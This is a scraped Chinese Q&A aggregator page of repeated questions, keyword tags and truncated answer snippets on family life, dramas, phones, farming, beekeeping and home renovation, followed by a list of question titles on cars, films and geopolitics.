
上有老 魔咒:上有老下有小,我們真的跳不出這個人生循環了嗎? 的確如此,儘管現在不結婚,晚婚的人很多,但是從人類繁洐生息的歷史和大多數人來看,成家立業,生兒育女,家庭仍是主流,一個人的生理,心理和生存需求決定了生存狀態,生兒育女,瞻養父母即是義務責任,也是生活動:-下有小

如果外面正在下小雨,你會突然想起了誰?

如果外面正在下小雨,你會突然想起了誰?

想起:如果外面正在下小雨,你會突然想起了誰? 我最不忘,還是秋日的雨夜,天又涼了幾分,已經需要披上一件薄薄的外套了。臨窗而望,眼見窗臺上的幾株小植物,葉片上沾了幾滴小雨珠,我總喜歡,用小手電去照它們,這樣的小水滴看起來晶瑩晶瑩的,有一種清清涼涼的:-小雨

初中同學許久未見大學期間突然聯繫請吃飯,態度還良好,我給推了,會不會讓人很煩?

初中同學許久未見大學期間突然聯繫請吃飯,態度還良好,我給推了,會不會讓人很煩?

初中 同學:初中同學許久未見大學期間突然聯繫請吃飯,態度還良好,我給推了,會不會讓人很煩? 吃飯 許久未見,意思就是交情不怎麼樣,無功不受祿,人家憑什麼那麼熱情,難道真的是多年一來忘不了咱們之間的同學情誼,倍感想念了嗎,不是請幫忙、做業務、就是借錢,十有八九十借錢。我建議還是不要去的好,大家都很忙:-許久未見

現在我覺得認真對某個人說我喜歡你什麼的這種話好惡心,我愛你更說不出口,好惡心,是什麼心理?

現在我覺得認真對某個人說我喜歡你什麼的這種話好惡心,我愛你更說不出口,好惡心,是什麼心理?

出口 心理:現在我覺得認真對某個人說我喜歡你什麼的這種話好惡心,我愛你更說不出口,好惡心,是什麼心理? 愛你 更多的是心裡問題,可能對方還沒有優秀到你滿意的程度,更沒有到那種離不開的地步!愛情最終還是要回歸生活,而生活離不開兩個人的相處,父母終究會老,孩子終究會飛,所以選擇自己的伴侶尤為重要,你現在覺得噁心更:-喜歡你

劇版的《何以笙簫默》和《再見王瀝川》哪一個更好看呢?

劇版的《何以笙簫默》和《再見王瀝川》哪一個更好看呢?

再見王瀝川 好看:劇版的《何以笙簫默》和《再見王瀝川》哪一個更好看呢? 《遇見王瀝川》吧,高以翔的王瀝川太招人稀罕了。長相,身材,家世,人品,才能樣樣好,簡直完美,挑不出任何毛病,實在要說一個缺點的話,那就是太tm完美,天妒英才、才讓他飽受病魔折磨。偶像劇、深情帥氣的男主:-何以笙簫默

計算機專業本科能夠進入字節跳動、華為這些公司做開發嗎?是否還需要繼續讀研?

計算機專業本科能夠進入字節跳動、華為這些公司做開發嗎?是否還需要繼續讀研?

學歷是求職必備條件。有了工作不能停止對知識的探索。更高的學歷,可以讓你有更專業的技術能力和學習能力,可以讓你拓展自己的交際圈,可以讓你更知名。總之,活到老,學到老,學習對人總是有好處的,技多不壓身嘛!:-字節 跳動:計算機專業本科能夠進入字節跳動、華為這些公司做開發嗎?是否還需要繼續讀研? 讀研 計算機專業

生完二胎的你們,現在有什麼感想?

生完二胎的你們,現在有什麼感想?

二胎家庭日常是什麼樣的?是不是覺得家裡多了一個小人兒,溫馨多了?不存在的!生二胎根本是媽媽們的渡劫磨礪!以前週末睡到自然醒,現在全年無休,時刻警醒著,能睡一次懶覺跟過年似的,黑眼圈不說,頭髮呼啦啦地掉:-生完 二胎 感想:生完二胎的你們,現在有什麼感想?

華北適合種植蠶豆嗎?

華北適合種植蠶豆嗎?

華北適合種植蠶豆,種蠶豆的面積大,在西北,華北,都在種植蠶豆,蠶豆莖稈根部有根瘤菌是種植其它農作物的好茬地,特別是土壤培養和防病蟲害起到作用。:-蠶豆 種植 適合:華北適合種植蠶豆嗎? 華北

華為手機更新EMUI10.1系統後效果咋樣?

華為手機更新EMUI10.1系統後效果咋樣?

大家知道現在智能手機的性能不僅僅跟智能手機的硬件有關,還跟智能手機的系統軟件息息相關,在國產智能手機操作系統裡,小米的MIUI系統跟華為的EMUI系統都是比較優秀的操作系統。最近小米推出了小米MIUI:-咋樣 華為 華為手機 更新:華為手機更新EMUI10.1系統後效果咋樣?

大熱天蜜蜂老是爬到箱外結群正常嗎?

大熱天蜜蜂老是爬到箱外結群正常嗎?

蜜蜂 爬到:大熱天蜜蜂老是爬到箱外結群正常嗎? 盜蜂現在正是夏季,很多地方蜜源稀少,蜂群中可能缺蜜,也是胡蜂猖獗的時間,所以蜂群中是非常容易發生盜蜂的。在蜂群中發生盜蜂的時候,蜂群守衛蜂會增多,但是這種情況引發的蜜蜂在蜂箱外一般不會結團,只是蜜蜂來:-大熱天

辣椒正是生長最佳期,偏偏有的辣椒苗蔫,不是病蟲害是咋回事?

辣椒正是生長最佳期,偏偏有的辣椒苗蔫,不是病蟲害是咋回事?

最佳期 霧都山客來回答您的問題。最近山客家鄉的村民正在進行辣椒移栽,確實有像題主提到的情形,辣椒苗移栽前長勢蔥蔥,嫩綠喜人,但是移栽後幾天內就出現萎蔫現象,細心觀察也不是被病蟲害危害。那究竟是什麼原因導致辣椒:-苗蔫 辣椒 咋回事:辣椒正是生長最佳期,偏偏有的辣椒苗蔫,不是病蟲害是咋回事?

手機相機發展的最終形態會是怎樣的?

手機相機發展的最終形態會是怎樣的?

最近這幾年手機在電子產品行業裡可謂是發展速度非常快,蘋果和華為兩大公司可以說也是,明爭暗鬥,產品一次比一次有賣點,前一段時間華為和蘋果還都推出了手機新品,兩家都在大力宣傳強調著拍照功能,像iPhone:-形態 相機 手機 最終:手機相機發展的最終形態會是怎樣的?

華為為什麼不出一款5寸全面屏手機呢?我想應該會有很多人支持吧?

華為為什麼不出一款5寸全面屏手機呢?我想應該會有很多人支持吧?

5寸 手機 支持:華為為什麼不出一款5寸全面屏手機呢?我想應該會有很多人支持吧? 很高興回答你的問題,刷頭條刷出來的問題,看到很多人回答,感覺還有一些觀點沒有寫出,所以我來回答一下。首先,華為為什麼不出小尺寸全面屏手機?其實並不只有華為一家沒有出小屏手機,放眼近期各大手機廠商發佈的:-華為

生吃山芋,生吃胡蘿蔔,還有哪些蔬菜可以生吃呢?

生吃山芋,生吃胡蘿蔔,還有哪些蔬菜可以生吃呢?

胡蘿蔔 蔬菜:生吃山芋,生吃胡蘿蔔,還有哪些蔬菜可以生吃呢? 第一種,黃瓜。這個瓜,可不是菜市場中堆放滿滿的青瓜。各位可要睜大眼睛看清楚了,這個黃瓜,青中帶黃,品種屬以前鄉下農戶少量種植的,形態上面來看這種瓜矮、短、圓,表面覆蓋有比較淡的細毛,經水輕輕沖洗之後整:-山芋

為什麼馬鈴薯不宜過早過遲播種?

為什麼馬鈴薯不宜過早過遲播種?

不宜:為什麼馬鈴薯不宜過早過遲播種? 播種 過早 為什麼馬鈴薯不宜過早過遲播種?馬鈴薯的種植主要是由於氣候條件的限制,過早出苗後容易遇到低溫被凍死,種植晚了容易遇到乾旱和高溫,影響產量。馬鈴薯種植時間的早晚必須根據種植地方的氣候條件來確定。馬鈴薯生長:-馬鈴薯

疫情愈發嚴重,原油為何反而大漲?

原油 愈發:疫情愈發嚴重,原油為何反而大漲? 疫情愈發嚴重和原油大漲沒有必然關係。但是資金總是從高處流向低處,原油價格跌的越多,投資價值越明顯,相對於其他產業更有投資價值。舉個例子:深圳南山房價均價大約6萬左右,寶安均價5萬左右,如果南山房價漲到:-疫情

生菜球很好吃,怎麼種植才能高產呢?

生菜球很好吃,怎麼種植才能高產呢?

種植:生菜球很好吃,怎麼種植才能高產呢? 高產 對環境條件的要求、1.溫度生菜球為喜冷涼、忌高溫作物,種子在4度以上可發芽、以15~20度為發芽適溫。幼苗能耐較低溫度,日平均溫度12度時生長壯健,葉球生長最適溫度為13~16度。不過目前有些結球生菜:-生菜

裝修高手來幫忙看下144平,套內122平,怎麼三房改四房? ?

裝修高手來幫忙看下144平,套內122平,怎麼三房改四房? ?

看下 這個戶型三房改四房,改一個小房間,應該沒有問題。△原戶型圖這個戶型改四房,能改的方案比較多,但是修改以後是否好用,是一件值得考慮的事情。一、主臥室變為兩個臥室可以將主臥室改為兩個臥室,但是這樣的改動佔:-房改 122:裝修高手來幫忙看下144平,套內122平,怎麼三房改四房? ? 144

大家幫忙看看這個房子如果要砸牆的話,怎麼改比較好?

大家幫忙看看這個房子如果要砸牆的話,怎麼改比較好?

房子:大家幫忙看看這個房子如果要砸牆的話,怎麼改比較好? 這個戶型砸牆,當然可以砸牆,但是在砸牆之前,要搞清楚為什麼要砸牆,砸牆以後有什麼優劣。△原戶型原戶型圖上的白色牆體部分不是承重牆,理論上說否可以砸掉。但是外牆和與旁邊戶型或者是公共區域的共用牆體和圖上:-幫忙

意蜂夏季喝什麼水降溫?

意蜂夏季喝什麼水降溫?

降溫 意蜂夏季喝什麼水降溫?氣溫高,蜂巢溫度高的情況下,蜜蜂是通過採水的辦法掛在蜂箱的四壁來蒸發帶走熱量,降低蜂巢溫度 同時也能幫助蜂群維持正常的溼度。在平常的情況下,蜜蜂是在室外採自然水的。夏季消耗的水量:-意蜂 夏季:意蜂夏季喝什麼水降溫?

黃瓜種子催芽後種植需要打底水嗎?

黃瓜種子催芽後種植需要打底水嗎?

黃瓜種子:黃瓜種子催芽後種植需要打底水嗎? 你好很高興回答這個問題。答案:不用。1-2天可出芽。黃瓜種子催芽:選用飽滿的種子,用30℃水浸泡4小時後催芽。也可用100倍福爾馬林溶液浸泡種子10-20分鐘,洗淨後清水浸種3-4小時,然後於25-3:-催芽 黃瓜 打底

書友們展示一下自我感覺發揮較好的作品,一起學習?

書友們展示一下自我感覺發揮較好的作品,一起學習?

自我 較好 這幅作品是參賽的,色彩的搭配,紙張的拼接都是自己設計完成的,一如既往的清新淡雅感覺。書體用的魏碑中楷書,增加了書寫的趣味性。:-書友 展示:書友們展示一下自我感覺發揮較好的作品,一起學習?

格林全場大爆發砍下28分,但湖人還是慘敗快船,這到底是為什麼?

“小李飛刀”迴歸百發百中,山東還需要丁彥雨航嗎?

cvt變速箱新車啟動聲音較大,過十幾秒後變小,正常嗎?

5萬公里了,有必要換火花塞嗎?

第一次鴉片戰爭,清政府為何會失敗?

前擋能不能貼膜,為什麼有人說前擋不讓貼膜?

勞力士型號為“116500LN”的熊貓迪手錶怎麼樣?

有沒有讓人一看就爆笑的GIF圖片?

你看到過的最搞笑的圖片是什麼?

笑死人不償命的圖片你有嗎?

有哪些圖片讓你笑出了腹肌?

有哪些搞笑的笑話和圖片分享一下?

說出你心中最經典的五部電影?

《無間道》放在現在票房能有多少?

一看到就讓你爆笑不停的搞笑段子或圖片有哪些?

你覺得張國榮有哪些經典的影視作品?

有沒有讓人一看就爆笑的GIF圖片?

伊朗的什麼武器,是美國最擔心的,最害怕的,都有什麼威脅和功能呢?

美國為什麼要在日本駐紮那麼多軍隊?

蘇聯曾擁有10艘航母,為何俄羅斯只繼承了一艘?

俄羅斯為什麼不使用武力重新恢復蘇聯?

印度的地理條件有多好?

孟加拉當時作為巴基斯坦一部分,為何非要選擇獨立?

如果俄羅斯進攻甚至吞併烏克蘭,美國有能力阻止普京嗎?

為何美俄二國會支持印度與巴基斯坦的對抗?是因為巴國擁有核武器對世界和平構成威脅嗎?

聽說新寶駿RM-5的智能安全多達30項,具體有哪些功能?

預算兩萬塊,比較不錯的腕錶品牌有哪些?

明知道發動機長時間開到3000轉以上是破壞發動機,為什麼車檢時要開到4000轉?

汽車超了2000公里沒換機油,對車有損害嗎?

買個7座車還能多兩座,為什麼有些人買完之後就後悔了?

你是否支持對酒駕造成嚴重傷亡事故的瑪莎拉蒂“富二代”美女車主實施死刑?為什麼?

斯大林格勒戰役中德軍損失不過30幾萬,為何卻是二戰轉折點?

盆栽樹型月季可以在室外過冬嗎?

月季新枝長得又細又長怎麼辦?

長壽花11月打頂還能開花嗎?

一個人有一段幸福的感情,但是又遇到一個吸引他的女人,他應該怎麼辦?

施工單位如何跳槽去甲方?

本人在私企幹了9年施工,目前是工程師,一級市政,建築,想找份穩定工作,有哪些推薦?

施工員的工資水平為什麼那麼低?

1.6L排量的車,以前速度120轉速3100,為什麼現在速度120轉速到4300了?